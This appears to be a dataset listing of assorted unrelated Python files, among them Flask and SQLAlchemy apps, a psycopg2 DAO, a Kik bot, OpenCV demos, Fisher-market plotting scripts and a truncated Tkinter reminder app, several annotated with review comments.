text stringlengths 8 6.05M |
|---|
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# SMTP session shared by checkSend().
# Fixed: the Gmail account password was hard-coded in source (it is already
# leaked in version control -- rotate it!).  Credentials now come from the
# environment: SMTP_USER / SMTP_PASSWORD.
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login(os.environ['SMTP_USER'], os.environ['SMTP_PASSWORD'])
def checkSend(variable):
    """Send `variable` as a plain-text mail through the module-level SMTP
    session `s`.

    Returns 'Message sent' on success, or the caught exception object on
    failure (kept as-is for backward compatibility with existing callers).
    Fixed: removed the unreachable `del msg` that followed the returns.
    """
    msg = MIMEMultipart()
    msg['From'] = 'servicedesk.transcend@gmail.com'
    msg['To'] = 'codespeisdocs@gmail.com'
    msg['Subject'] = "BackUp mailing Function"
    msg.attach(MIMEText(variable, 'plain'))
    try:
        s.send_message(msg)
        return 'Message sent'
    except Exception as expt:
        # NOTE(review): returning the exception instead of raising hides
        # failures from callers that only expect a string.
        return expt
# Question
#
# Given 2 strings a and b with the same length. Strings are aligned one under the other.
# We can choose an index and split both strings into 4 substrings: a1 + a2 and b1 + b2. Find out if it's possible to split a and b such that
# a1 + b2 or a2 + b1 forms a palindrome.
#
# Example 1:
#
# Input: a = "abcbbbb", b = "xxxbcba"
# Output: true
# Explanation:
#
# abc|bbbb
# xxx|bcba
#
# We can split the strings at index 3. We will get a1 = "abc", a2 = "bbbb" and b1 = "xxx", b2 = "bcba"
# a1 + b2 forms a palindrome "abcbcba" so return true.
# Follow-up:
# Now it's allowed to split the strings independently:
#
# a|bcbbbb
# xxxbcb|a
# So in the example above a can be split into a1 = "a" a2 = "bcbbbb" and b can be split into b1 = "xxxbcb" b2 = "a".
# As a result a1+ b2 forms a palindrome "aa". Find the longest palindrome.
#
def base_solution(a, b):
    """Return True if some split makes a-prefix + b-suffix (or b-prefix +
    a-suffix) a palindrome.

    Fixed: `||` is not a Python operator (SyntaxError); use `or`.
    """
    return find_palindrome_index(a, b) or find_palindrome_index(b, a)
def find_palindrome_index(a, b):
    """Return True if a[:k] + b[k:] is a palindrome for some split index k.

    Walk a forward and b backward while the characters mirror each other.
    At the first mismatch the combined string can still be a palindrome if
    the uncrossed middle of EITHER string is itself a palindrome.

    Fixed: the original only tested b's middle after a mismatch, missing
    cases like a="caaz", b="pqrc" (split k=3 gives "caa"+"c" = "caac").
    """
    i, j = 0, len(a) - 1
    while i < j and a[i] == b[j]:
        i += 1
        j -= 1
    return _is_palindrome(a, i, j) or _is_palindrome(b, i, j)


def _is_palindrome(s, i, j):
    """True if s[i..j] (inclusive) reads the same forwards and backwards."""
    while i < j:
        if s[i] != s[j]:
            return False
        i += 1
        j -= 1
    return True
# I guess the candidate remembered the follow-up wrong?
def follow_up(a, b):
    """Compare the first character of a with the last character of b."""
    first_of_a = a[0]
    last_of_b = b[-1]
    return first_of_a == last_of_b
|
# -*- coding: utf-8 -*-
import psycopg2
import uuid
import logging
class Files:
    """Data-access object for the files.files table (PostgreSQL/psycopg2).

    Expected schema:
        create schema files
        create table files.files (
            id varchar not null primary key,
            name varchar not null,
            hash varchar,
            content text,
            created timestamptz default now()
        )

    NOTE(review): persist() also writes mimetype, codec and size columns that
    are missing from the schema comment above -- confirm the real DDL.
    """

    def persist(self, con, id, name, mimetype, codec, data):
        """Create (when id is None) or update a document; return the row id.

        Commit/rollback is left to the caller that owns `con`.
        """
        size = len(data) if data is not None else 0
        cur = con.cursor()
        if id is None:
            id = str(uuid.uuid4())
            cur.execute('insert into files.files (id, name, mimetype, codec, size, content) values (%s,%s,%s,%s,%s,%s)',
                        (id, name, mimetype, codec, size, data))
        else:
            # Fixed: "set (name = %s, content = %s)" is invalid PostgreSQL;
            # a plain comma-separated SET list is required.
            cur.execute('update files.files set name = %s, content = %s, mimetype = %s, codec = %s, size = %s where id = %s',
                        (name, data, mimetype, codec, size, id))
        return id

    def findAllIds(self, con):
        """Return the ids of every stored file (empty list when none)."""
        cur = con.cursor()
        cur.execute('select id from files.files')
        return [row[0] for row in cur]

    def check(self, con, id):
        """Return True when a file with this id exists."""
        cur = con.cursor()
        cur.execute('select id from files.files where id = %s', (id,))
        return cur.rowcount > 0

    def findById(self, con, id):
        """Return the whole row (including content) as a dict, or None."""
        cur = con.cursor()
        cur.execute('select id, name, mimetype, codec, size, created, content from files.files where id = %s', (id,))
        row = cur.fetchone()
        if row is None:
            return None
        keys = ('id', 'name', 'mimetype', 'codec', 'size', 'created', 'content')
        return dict(zip(keys, row))

    def findMetaDataById(self, con, id):
        """Return the row's metadata (without content) as a dict, or None."""
        cur = con.cursor()
        cur.execute('select id, name, mimetype, codec, size, created from files.files where id = %s', (id,))
        row = cur.fetchone()
        if row is None:
            return None
        keys = ('id', 'name', 'mimetype', 'codec', 'size', 'created')
        return dict(zip(keys, row))

    def search(self, con, text):
        """Not implemented yet."""

    def remove(self, con, id):
        """Not implemented yet."""
|
class Fibgen(object):
    """Fibonacci generator with an optional class-level memo table.

    The memo is shared by all callers (class attribute), exactly like the
    original implementation.
    """
    memo = [1, 1]      # memo[x] == x-th Fibonacci number (1, 1, 2, 3, ...)
    use_memo = 0       # last `use_memo` flag passed to fib()

    @staticmethod
    def fib(use_memo=0):
        """Yield Fibonacci numbers indefinitely, starting 1, 1, 2, ..."""
        Fibgen.use_memo = use_memo
        index = 0
        while True:
            yield Fibgen.fibber(index)
            index += 1

    @staticmethod
    def fibber(x):
        """Return the x-th Fibonacci number.

        Fixed: the original recursed doubly, which is exponential when
        use_memo is off; the memo table is now filled iteratively, producing
        the same values and the same final memo state.
        """
        if Fibgen.use_memo and len(Fibgen.memo) > x:
            return Fibgen.memo[x]
        if x < 2:
            return 1
        while len(Fibgen.memo) <= x:
            Fibgen.memo.append(Fibgen.memo[-1] + Fibgen.memo[-2])
        return Fibgen.memo[x]
from datetime import datetime
from flask_sqlalchemy import BaseQuery
from sqlalchemy import desc
from fyyur import db
class ShowQuery(BaseQuery):
    """Reusable queries for the Show model."""

    def artist_upcoming_shows(self, id_model):
        """Shows by artist `id_model` starting now or later."""
        return self.filter(Show.artist_id == id_model, Show.start_time >= datetime.now())

    def venue_upcoming_shows(self, id_model):
        """Shows at venue `id_model` starting now or later."""
        return self.filter(Show.venue_id == id_model, Show.start_time >= datetime.now())

    def search(self, search_term):
        """Shows whose venue or artist name contains `search_term`, newest first."""
        return self.join(Venue).join(Artist) \
            .filter((Venue.name.ilike('%{0}%'.format(search_term))) | (Artist.name.ilike('%{0}%'.format(search_term)))) \
            .order_by(desc(Show.start_time))

    def by_artist_and_venue(self, venue_id, artist_id):
        """Shows for one specific venue/artist pair."""
        return self.filter(Show.venue_id == venue_id, Show.artist_id == artist_id)

    def by_date(self, date, artist_id):
        """Shows by `artist_id` on the calendar day of `date`.

        Fixed: the end of the day used microsecond=0, which silently
        excluded shows timestamped in the final second of the day.
        """
        date_start = date.replace(hour=0, minute=0, second=0, microsecond=0)
        date_end = date.replace(hour=23, minute=59, second=59, microsecond=999999)
        return self.filter(Show.start_time.between(date_start, date_end), Show.artist_id == artist_id)
class VenueQuery(BaseQuery):
    """Reusable queries for the Venue model."""

    def group_state_and_city(self):
        """Distinct (state, city) pairs, ordered alphabetically."""
        pairs = self.with_entities(Venue.state, Venue.city)
        return pairs.group_by(Venue.state, Venue.city).order_by(Venue.state, Venue.city)

    def by_state_and_city(self, state, city):
        """Venues in the given state and city, ordered by name."""
        return self.filter(Venue.state == state, Venue.city == city).order_by(Venue.name)

    def search(self, term):
        """Case-insensitive substring match on the venue name."""
        pattern = '%{0}%'.format(term)
        return self.filter(Venue.name.ilike(pattern))

    def top_10(self):
        """The ten most-viewed venues (views > 0), most viewed first."""
        ranked = self.with_entities(Venue.id, Venue.name, Venue.views)
        return ranked.filter(Venue.views > 0).order_by(desc(Venue.views)).limit(10)
class ArtistQuery(BaseQuery):
    """Reusable queries for the Artist model."""

    def search(self, term):
        """Case-insensitive substring match on the artist name."""
        pattern = '%{0}%'.format(term)
        return self.filter(Artist.name.ilike(pattern))

    def top_10(self):
        """The ten most-viewed artists (views > 0), most viewed first."""
        ranked = self.with_entities(Artist.id, Artist.name, Artist.views)
        return ranked.filter(Artist.views > 0).order_by(desc(Artist.views)).limit(10)
class Show(db.Model):
    """Association model between Venue and Artist (N-M), one row per show."""
    __tablename__ = 'Shows'
    query_class = ShowQuery
    # Composite primary key: one (venue, artist) pair per row.
    # NOTE(review): this forbids two shows by the same artist at the same
    # venue on different dates -- confirm that is intended.
    venue_id = db.Column(db.Integer, db.ForeignKey('Venue.id'), primary_key=True)
    artist_id = db.Column(db.Integer, db.ForeignKey('Artist.id'), primary_key=True)
    start_time = db.Column(db.DateTime, nullable=False)
    # lazy-loaded relationships; both sides gain a "shows" backref
    venue = db.relationship('Venue', lazy='select', backref=db.backref("shows"))
    artist = db.relationship('Artist', lazy='select', backref=db.backref("shows"))
class Venue(db.Model):
    """A venue that hosts shows."""
    __tablename__ = 'Venue'
    query_class = VenueQuery
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    city = db.Column(db.String(120))
    state = db.Column(db.String(120))
    address = db.Column(db.String(120))
    phone = db.Column(db.String(120))
    genres = db.Column(db.String(120))
    image_link = db.Column(db.String(500))
    facebook_link = db.Column(db.String(120))
    website_link = db.Column(db.String(250))
    seeking_talent = db.Column(db.Boolean)
    seeking_description = db.Column(db.String(500))
    views = db.Column(db.Integer, default=0)

    def fill_from_dict(self, data):
        """Populate this venue from a form-style dict; returns self."""
        for field in ('name', 'city', 'state', 'address', 'phone'):
            setattr(self, field, data[field])
        # genres arrive as a list and are persisted comma-separated
        self.genres = ','.join(data['genres'])
        for field in ('image_link', 'facebook_link', 'website_link',
                      'seeking_talent', 'seeking_description'):
            setattr(self, field, data[field])
        return self

    @staticmethod
    def from_dict(data):
        """Build a fresh Venue from a form-style dict."""
        return Venue().fill_from_dict(data)
class Artist(db.Model):
    """An artist that performs shows."""
    __tablename__ = 'Artist'
    query_class = ArtistQuery
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String)
    city = db.Column(db.String(120))
    state = db.Column(db.String(120))
    phone = db.Column(db.String(120))
    genres = db.Column(db.String(120))
    image_link = db.Column(db.String(500))
    facebook_link = db.Column(db.String(120))
    website_link = db.Column(db.String(250))
    seeking_venue = db.Column(db.Boolean)
    seeking_description = db.Column(db.String(500))
    views = db.Column(db.Integer, default=0)

    def fill_from_dict(self, data):
        """Populate this artist from a form-style dict; returns self."""
        for field in ('name', 'city', 'state', 'phone'):
            setattr(self, field, data[field])
        # genres arrive as a list and are persisted comma-separated
        self.genres = ','.join(data['genres'])
        for field in ('image_link', 'facebook_link', 'website_link',
                      'seeking_venue', 'seeking_description'):
            setattr(self, field, data[field])
        return self

    @staticmethod
    def from_dict(data):
        """Build a fresh Artist from a form-style dict."""
        return Artist().fill_from_dict(data)
|
from flask import Flask, request, Response
from kik import KikApi, Configuration
from kik.messages import messages_from_json, TextMessage
from wikt import WiktionarySearch
import os
from os import environ
app = Flask(__name__)
# Bot credentials and webhook URL come from the environment
# (BOT_API_KEY, WEBHOOK); the bot registers its webhook at startup.
kik = KikApi("etybot", environ['BOT_API_KEY'])
kik.set_configuration(Configuration(webhook=environ['WEBHOOK']))
@app.route('/incoming', methods=['POST'])
def incoming():
    """Kik webhook: answer each incoming text message with its etymology
    from Wiktionary, or "no" when the word is unknown.

    Fixed: `message.body` was read before checking the message type, which
    crashed on non-text messages (they have no body).  Non-text messages
    are now skipped; behaviour for text messages is unchanged.
    """
    if not kik.verify_signature(request.headers.get('X-Kik-Signature'), request.get_data()):
        return Response(status=403)
    messages = messages_from_json(request.json['messages'])
    for message in messages:
        if not isinstance(message, TextMessage):
            continue
        ws = WiktionarySearch(message.body.lower())
        reply = ws.getEty() if ws.existe() else "no"
        kik.send_messages([
            TextMessage(
                to=message.from_user,
                chat_id=message.chat_id,
                body=reply
            )
        ])
    return Response(status=200)
if __name__ == "__main__":
    # NOTE(review): debug=True and port 80 are development settings --
    # do not deploy this entry point as-is.
    app.run(port=80, debug=True)
|
#!/usr/bin/env python3
import time
from flask import Flask
import secret
import config
from models.base_model import db
from routes.index import main as index_routes
from routes.topic import main as topic_routes
from routes.reply import main as reply_routes
from routes.user import main as user_routes
from routes.board import main as board_routes
from routes.message import main as mail_routes
from routes.reset import main as reset_routes
from routes.setting import main as setting_routes
from utils import log
def count(input):
    """Jinja filter: length of a collection, treating None as empty."""
    # (`input` shadows the builtin, but the name is part of the existing
    # filter signature and is kept.)
    return 0 if input is None else len(input)
def format_time(unix_timestamp):
# enum Year():
# 2013
# 13
# f = Year.2013
f = '%Y-%m-%d %H:%M:%S'
value = time.localtime(unix_timestamp)
formatted = time.strftime(f, value)
return formatted
def time_between_now(unix_timestamp):
    """
    Human-readable age of a unix timestamp: "x年前" (years ago), "x个月前",
    "x天前", "x小时前", "x分钟前", "x秒前".

    Fixed: the original subtracted calendar fields independently, so e.g.
    July 1 vs June 28 reported "1个月前" instead of "3天前", and fields
    could go negative; the minute branch also used "> 1" instead of "> 0".
    The age is now derived from the raw second difference (months/years
    approximated as 30/365 days).  Returns None for timestamps that are
    now or in the future, matching the original fall-through behaviour.
    """
    seconds = int(time.time()) - int(unix_timestamp)
    years = seconds // (365 * 86400)
    months = seconds // (30 * 86400)
    days = seconds // 86400
    hours = seconds // 3600
    minutes = seconds // 60
    if years > 0:
        return str(years) + "年前"
    if months > 0:
        return str(months) + "个月前"
    if days > 0:
        return str(days) + "天前"
    if hours > 0:
        return str(hours) + "小时前"
    if minutes > 0:
        return str(minutes) + "分钟前"
    if seconds > 0:
        return str(seconds) + "秒前"
def time_dict(unix_timestamp):
    """
    Decompose a unix timestamp into local-time fields, e.g.
    {'year': 2019, 'month': 6, 'day': 18, 'hour': 8, 'minute': 56, 'second': 14}
    """
    # read the struct_time fields directly instead of round-tripping
    # through a formatted string
    local = time.localtime(unix_timestamp)
    return dict(
        year=local.tm_year,
        month=local.tm_mon,
        day=local.tm_mday,
        hour=local.tm_hour,
        minute=local.tm_min,
        second=local.tm_sec,
    )
def configured_app():
    """Build and return the Flask app: session key, MySQL URI, routes."""
    flask_app = Flask(__name__)
    # secret_key enables Flask's signed-cookie sessions
    flask_app.secret_key = secret.secret_key
    database_uri = 'mysql+pymysql://root:{}@localhost/bbs?charset=utf8mb4'.format(
        secret.database_password
    )
    flask_app.config['SQLALCHEMY_DATABASE_URI'] = database_uri
    flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    db.init_app(flask_app)
    register_routes(flask_app)
    return flask_app
def register_routes(app):
    """Register every blueprint (with its URL prefix) and the jinja filters.

    Flask's blueprints provide modular routing; each blueprint may carry
    its own static/template paths.
    """
    blueprints = (
        (index_routes, None),
        (topic_routes, '/topic'),
        (reply_routes, '/reply'),
        (board_routes, '/board'),
        (mail_routes, '/mail'),
        (reset_routes, '/reset'),
        (setting_routes, '/setting'),
        (user_routes, '/user'),
    )
    for blueprint, prefix in blueprints:
        if prefix is None:
            app.register_blueprint(blueprint)
        else:
            # url_prefix prepends the prefix to every route in the blueprint
            app.register_blueprint(blueprint, url_prefix=prefix)
    # expose the helper functions as jinja template filters
    for filter_func in (count, format_time, time_between_now):
        app.template_filter()(filter_func)
# Run the app when executed directly.
if __name__ == '__main__':
    app = configured_app()
    # debug mode reloads on code changes, so no manual restart is needed;
    # host '0.0.0.0' (instead of localhost) would allow external access
    # also auto-reload jinja templates
    app.config['TEMPLATES_AUTO_RELOAD'] = True
    app.jinja_env.auto_reload = True
    app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
    config = dict(
        debug=True,
        host='localhost' ,
        port=3000,
        threaded=True,
    )
    app.run(**config)
|
# coding:utf-8
# Python's built-in range() lazily yields a sequence of integers.
for number in range(10):
    print(number)
# len() returns a sequence's length.  Instead of pairing range() with
# len(), the idiomatic way to walk a list together with its indices is
# enumerate(); the printed output is identical.
array = ['a', 'b', 'c', 'd', 'e']
for index, value in enumerate(array):
    print(index, value)
|
# Connection settings -- presumably for a local InfluxDB instance
# (8086 is the InfluxDB default port); confirm against the consumer of
# these values.  NOTE(review): blank password/database look like
# placeholders to be filled in from a secret store.
ifuser = "admin"
ifpass = ""
ifdb = ""
ifhost = "127.0.0.1"
ifport = 8086
# coding: utf-8
# In[1]:
import cv2
import numpy as np
import imutils  # NOTE(review): imported but unused in this snippet
# In[2]:
'''Using OpenCV, addition/subtraction of images performs clipping i.e. values falling outside the range [0,255]
are clipped'''
img = cv2.imread('./datasets/flower1.jpg')
# brighten: add a constant 100 to every pixel/channel (saturates at 255)
matrix = np.ones(img.shape, dtype='uint8')*100
added_image = cv2.add(img,matrix)
cv2.imshow('Added_Image', added_image)
cv2.waitKey(0)
# In[3]:
#Subtracting the images
# darken: subtract a constant 50 from every pixel/channel (clips at 0)
matrix2 = np.ones(img.shape,dtype='uint8')*50
subtract_image = cv2.subtract(img, matrix2)
cv2.imshow('Subtracted_Image', subtract_image)
cv2.waitKey(0)
# In[ ]:
# NOTE(review): with uint8 numpy arithmetic the value wraps modulo 256,
# so 260 actually becomes 4, not 5 as the note below claims.
'''In case of adding 2 numpy arrays using np.sum, if a value falls outside 255 let's say 260, the value
will be wrapped around which would be 5 '''
|
#%%
import fisherMarket as m
import matplotlib.pyplot as plt
import numpy as np
############################################################################
# Fisher-market budget sweeps: for several example economies, repeatedly
# solve the market while transferring budget between buyers, then plot how
# the equilibrium prices respond.  The original file repeated the same
# stanza eight times (and shadowed the builtin `iter`); the sweep and plot
# logic is factored into the two helpers below.  All titles/labels/file
# names are preserved byte-for-byte.
############################################################################

def _run_sweep(valuation_sets, start_budgets, utility, deltas, steps=101):
    """Solve each market in `valuation_sets` `steps` times, shifting the
    buyers' budgets by `deltas` after every solve.

    valuation_sets -- list of |buyers| x |goods| valuation matrices
    start_budgets  -- initial budget per buyer
    utility        -- 'linear' or 'quasi-linear'
    Returns (price_series, budget_traces): one prices array (steps x goods)
    per valuation matrix, and one recorded budget trace per buyer.
    """
    budgets = np.array(start_budgets)
    deltas = np.array(deltas)
    price_series = [[] for _ in valuation_sets]
    budget_traces = [[] for _ in start_budgets]
    for _ in range(steps):
        for k, valuations in enumerate(valuation_sets):
            market = m.FisherMarket(valuations, budgets)
            # current utility options are 'quasi-linear' and 'linear'
            _, p = market.solveMarket(utility, printResults=False)
            price_series[k].append(p)
        for k, budget in enumerate(budgets):
            budget_traces[k].append(budget)
        budgets = budgets + deltas
    return [np.array(series) for series in price_series], budget_traces


def _plot_sweep(prices, budget_traces, styles, titles, xlabels, ylabels,
                figsize=(12, 5), fname=None):
    """One subplot per buyer: each good's price against that buyer's budget.

    The legend is attached to the last subplot (as in the original) and the
    figure is written to `fname` when given.
    """
    plt.figure(figsize=figsize)
    columns = len(budget_traces)
    for col, trace in enumerate(budget_traces):
        ax = plt.subplot(1, columns, col + 1)
        for good in range(prices.shape[1]):
            ax.plot(trace, prices[:, good], styles[good],
                    label="Good {0}".format(good + 1))
        plt.title(titles[col])
        plt.xlabel(xlabels[col])
        plt.ylabel(ylabels[col])
    plt.legend()
    if fname is not None:
        plt.savefig(fname)


############################### Linear, Example 1 ##########################
(prices,), traces = _run_sweep([np.array([[1, 2, 3], [3, 2, 1]])],
                               [0.0, 10.0], "linear", [0.1, -0.1])
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Linear: Prices vs Budget of Buyer 1\nValuations: [1, 2, 3]",
             "Linear: Prices vs Budget of Buyer 2\nValuations: [3, 2, 1]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), fname="graph1.png")

############################### Linear, Example 2 ##########################
(prices,), traces = _run_sweep([np.array([[5, 2, 1], [4, 2, 3]])],
                               [0.0, 10.0], "linear", [0.1, -0.1])
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Linear: Prices vs Budget of Buyer 1\nValuations: [5 , 2, 1]",
             "Linear: Prices vs Budget of Buyer 2\nValuations: [4 , 2, 3]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), fname="graph2.png")

################## Linear, Example 3: when goods are not good ##############
(prices,), traces = _run_sweep([np.array([[2, 0, 1], [0, 2, 1]])],
                               [0.0, 10.0], "linear", [0.1, -0.1])
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Linear: Prices vs Budget of Buyer 1\nValuations: [2, 0, 1]",
             "Linear: Prices vs Budget of Buyer 2\nValuations: [0, 2, 1]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), fname="graph3.png")

############################ Quasilinear, Example 1 ########################
(prices,), traces = _run_sweep([np.array([[1, 2, 3], [3, 2, 1]])],
                               [0.0, 10.0], "quasi-linear", [0.1, -0.1])
# NOTE(review): the second title had no "Quasi: " prefix originally; kept.
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Quasi: Prices vs Budget of Buyer 1\nValuations: [1, 2, 3]",
             "Prices vs Budget of Buyer 2\nValuations: [3, 2, 1]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), fname="graph4.png")

############################ Quasilinear, Example 2 ########################
(prices,), traces = _run_sweep([np.array([[5, 2, 1], [4, 2, 3]])],
                               [0.0, 10.0], "quasi-linear", [0.1, -0.1])
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Quasi: Prices vs Budget of Buyer 1\nValuations: [5, 2, 1]",
             "Quasi: Prices vs Budget of Buyer 2\nValuations: [4, 2, 3]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), fname="graph5.png")

############## Quasilinear, Example 3: when goods are not good #############
(prices,), traces = _run_sweep([np.array([[2, 0, 1], [0, 2, 1]])],
                               [0.0, 10.0], "quasi-linear", [0.1, -0.1])
_plot_sweep(prices, traces, ("-g", "-b", "-r"),
            ("Quasi: Prices vs Budget of Buyer 1\nValuations: [2, 0, 1]",
             "Quasi: Prices vs Budget of Buyer 2\nValuations: [0, 2, 1]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Prices"), figsize=(12, 10), fname="graph6.png")

################ Quasilinear, Example 4: more than 2 buyers ################
(prices,), traces = _run_sweep([np.array([[2, 1, 1], [1, 2, 1], [1, 1, 2]])],
                               [10.0, 0.0, 0.0], "quasi-linear",
                               [-0.1, 0.05, 0.05])
_plot_sweep(prices, traces, ("-g", "-b", "--r"),
            ("Quasi: Prices vs Budget of Buyer 1\nValuations: [2, 1, 1]",
             "Quasi: Prices vs Budget of Buyer 2\nValuations: [1, 2, 1]",
             "Quasi: Prices vs Budget of Buyer 3\nValuations: [1, 1, 2]"),
            ("Budget of Buyer 1", "Budget of Buyer 2", "Budget of Buyer 3"),
            ("Prices", "Prices", "Prices"), figsize=(12, 4),
            fname="graph7.png")

############## Individual markets of the economy example ###################
# Two markets are solved on the SAME budget sweep: a goods (demand) market
# and a labour (supply) market.  Neither figure was saved in the original.
demandV = np.array([[8.0, 2.0], [2.0, 5.0]])   # buyers/workers x goods
supplyV = np.array([[5.0, 3.0], [1.0, 5.0]])   # firms x workers
(prices, wages), traces = _run_sweep([demandV, supplyV],
                                     [0.0, 10.0], "linear", [0.1, -0.1])
# NOTE(review): the mixed "Prices"/"Wages" y-labels reproduce the original.
_plot_sweep(prices, traces, ("-g", "-b"),
            ("Linear: Prices vs Budget of Buyer 1\nValuations: [8.0, 2.0], [2.0, 5.0]",
             "Linear: Prices vs Budget of Buyer 2\nValuations: [8.0, 2.0], [2.0, 5.0]"),
            ("Budget of Buyer 1", "Budget of Buyer 2"),
            ("Prices", "Wages"))
_plot_sweep(wages, traces, ("-g", "-b"),
            ("Linear: Wages vs Budget of Firms 1\nValuations: [5.0, 3.0], [1.0, 5.0]",
             "Linear: Wages vs Budget of Firms 2\nValuations: [5.0, 3.0], [1.0, 5.0]"),
            ("Budget of firm 1", "Budget of firm 2"),
            ("Prices", "Prices"))
# %%
|
try:
    # Python 2 module name
    from Tkinter import *
except ImportError:
    # Python 3 module name
    from tkinter import *
from tkinter import ttk
import datetime as dt
import json
import time
from time import sleep
from PIL import ImageTk, Image
# Fixed: json/time/datetime and the tkinter star-import were each imported
# twice, and execution_count was initialised twice; duplicates removed.

# time of program start; shown in the window and stored with reminders
t_now = dt.datetime.now()
# path to reminders file (a JSON list)
REM_FILE = "json/abf.txt"
# reminders merged from REM_FILE (see bottom of file)
a = []
# number of reminder popups shown so far
execution_count = 0
# root (top level element) config
class REMINDER():
def __init__(self):
# root (top level element) config
self.root = Tk()
self.root.geometry("250x150+480+200")
#self.root.geometry('%dx%d+%d+%d' % (220,270, 1050, 380))
self.root.title("IALrt")
self.root.iconbitmap("C:/Users/Arpit/Pictures/exercise.ico")
# Collect time information
#t_now = dt.datetime.now() # Current time for reference. [datetime object]
#t_pom = 25*60 # Pomodoro time [int, seconds]
#t_delta = dt.timedelta(0,t_pom) # Time delta in mins [datetime object]
#t_fut = t_now + t_delta # Future time for reference [datetime object]
#delta_sec = 1#60 # Break time, after pomodoro [int, seconds]
#t_fin = t_now + dt.timedelta(0,t_pom+delta_sec) # Final time (w/ 5 mins break) [datetime object]
# main frame (inside root) config
self.mainFrame = Frame(self.root, padx=10, pady = 10)
self.mainFrame.pack()
# first field frame (inside main frame) config
self.fieldRow1 = Frame(self.mainFrame, padx=5, pady=5)
Label(self.fieldRow1, text="Current Time: "+t_now.strftime("%I:%M %p")).grid(row=0, column=0)
#self.rem = Entry(self.fieldRow1)
#self.rem.grid(row=0, column=1)
self.fieldRow1.pack()
# second field frame (inside main frame) config
# self.fieldRow2 = Frame(self.mainFrame, padx=5, pady=5)
# Label(self.fieldRow2, text="Active Between:", width=15).grid(row=0, column=0)
# self.hrs1 = Entry(self.fieldRow2, width=5)
# OptionMenu(self.fieldRow2, self.mins2,"00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11",
# "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25","26", "27", "28", "29", "30", "31", "32", "33", "34", "35",
# "36", "37", "38", "39", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "60").grid(row=1, column=3)
# self.clk2 = StringVar()
# self.clk2.set('PM')
# OptionMenu(self.fieldRow2, self.clk2, 'AM', 'PM').grid(row=1, column=4)
# self.fieldRow2.pack()
self.fieldRow3 = Frame(self.mainFrame, padx=5, pady=5)
Label(self.fieldRow3, text="Reminder frequency (minutes):", width=25).grid(row=2, column=0)
self.minsfrequency = Entry(self.fieldRow3, width=5)
self.minsfrequency.grid(row=2, column=1)
self.fieldRow3.pack()
# button frame (inside main frame) config
self.buttonRow = Frame(self.mainFrame, padx=10, pady=10)
self.btn1 = Button(self.buttonRow, text="Save", command=self.saveReminder).grid(row=0, column=0)
self.btn2 = Button(self.buttonRow, text="Cancel", command=self.cancelReminder).grid(row=0, column=2)
self.buttonRow.grid_columnconfigure(1, minsize=10)
self.buttonRow.pack()
# call mainloop of Tk object
self.root.mainloop()
def saveReminder(self):
'''
utility function to save reminder
'''
#reminder = self.rem.get().strip()
# hrs1 = int(self.hrs1.get().strip())
# mins1 = int(self.mins1.get().strip())
# clk1 = self.clk1.get()
# mins2 = int(self.mins2.get().strip())
# clk2 = self.clk2.get()
# if clk2 == 'PM':
# hrs2 += 12
#
#hrs1, mins1,hrs2,mins2,
minsfrequency = int(self.minsfrequency.get().strip())
# update list of reminders
with open(REM_FILE, 'r+') as f:
reminders = json.load(f)
f.seek(0)
reminders.append((minsfrequency,(t_now.hour*60*60+t_now.minute*60)))
f.write(json.dumps(reminders))
f.truncate()
self.root.destroy()
def cancelReminder(self):
'''
utility function to close window
'''
self.root.destroy()
if __name__ == "__main__":
    # Show the configuration dialog (blocks in mainloop).  The definitions
    # and the reminder-loading code further below still execute afterwards.
    REMINDER()
def center(win):
    """Center the window `win` on the screen."""
    # Call all pending idle tasks so winfo_width/height return real sizes.
    win.update_idletasks()
    width = win.winfo_width()
    height = win.winfo_height()
    # Fixed: the computed position was previously discarded in favour of a
    # hard-coded geometry string ('220x270+1050+380'), and the offset used
    # the full width/height instead of half, so nothing was centered.
    x = (win.winfo_screenwidth() // 2) - (width // 2)
    y = (win.winfo_screenheight() // 2) - (height // 2)
    win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
def eye_action(win, more):
    '''Handle the user's response to a break-reminder window.

    win  -- the Toplevel reminder window to close.
    more -- True: wait ``snooze_time`` seconds and show another
            reminder; False: quit the whole application.
    '''
    global execution_count
    global root
    print('Answer', more)
    if more:
        win.destroy()
        # NOTE(review): sleep() blocks the Tk event loop for the whole
        # snooze interval -- the UI is frozen while waiting.
        sleep(snooze_time)
        execution_count = execution_count + 1
        EyeReminderWindow()
    else:
        win.destroy()
        root.destroy()
def EyeReminderWindow():
    '''Create and show a topmost "take a break" reminder window.

    The window auto-snoozes after 5 seconds (same as answering "more")
    and offers a Dismiss button that exits the application.  Uses the
    module-level ``root``, ``execution_count`` and ``image_list``
    globals.
    '''
    #global image_num
    global root
    print('Execution', execution_count)
    win = Toplevel()
    center(win)
    # withdraw/deiconify cycle forces the window manager to apply the
    # geometry before the window becomes visible
    win.withdraw()
    win.update_idletasks()
    win.resizable(False,False)
    win.deiconify()
    win.title("IALrt")
    # NOTE(review): hard-coded user-specific icon path -- breaks on any
    # other machine.
    win.iconbitmap("C:/Users/Arpit/Pictures/exercise.ico")
    # width of the screen
    # height of the screen
    #ttk.Label(win,image=my_img1).grid(row=0,column=0)
    message1='Time for a little break!'
